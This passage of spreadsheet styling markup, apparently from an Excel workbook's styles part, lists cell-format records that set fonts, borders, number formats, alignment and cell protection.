    <xf numFmtId="49" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="49"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40" fillId="0" borderId="0" xfId="29" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="25" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="41" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="17" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="49" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="49" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="2"/>
    </xf>
    <xf numFmtId="49" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" indent="3"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="17" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="17" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="13" fillId="0" borderId="1" xfId="31"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wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="1" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="1"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176" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="31" applyNumberFormat="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="31" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1"/>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="30" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="9" fillId="0" borderId="1" xfId="30" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="36"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31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="42" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="31" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" shrinkToFit="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="0" xfId="31" applyNumberFormat="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="3" fillId="0" borderId="0" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="31" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="176" fontId="18" fillId="0" borderId="0" xfId="31" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="1" fontId="2" fillId="0" borderId="1" xfId="0"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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="2" borderId="0" xfId="31" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyAlignment="1">
      <alignment horizontal="left"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="0" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="12" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="5" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="1" xfId="5" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="27" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="27" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1"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5" fillId="0" borderId="1" xfId="39" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="176" fontId="5" fillId="0" borderId="1" xfId="3" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="39" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="39" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="176" fontId="2" fillId="0" borderId="1" xfId="39" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="center" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="39" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="43" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="35" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" applyNumberFormat="1"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wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="41" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="33" fillId="0" borderId="0" xfId="41" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="41" applyFont="1" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="41" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="41" applyFill="1" applyProtection="1">
      <alignment vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="41" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="41" applyFont="1" applyFill="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="right" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="1" xfId="26" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="184" fontId="5" fillId="0" borderId="1" xfId="46" applyNumberFormat="1" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center" wrapText="1"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="1" xfId="34" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="center" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="2" fillId="0" borderId="1" xfId="34" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1" applyProtection="1">
      <alignment horizontal="left" vertical="center"/>
      <protection locked="0"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="left" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="18" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment horizontal="right" vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="24" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment vertical="center"/>
    </xf>
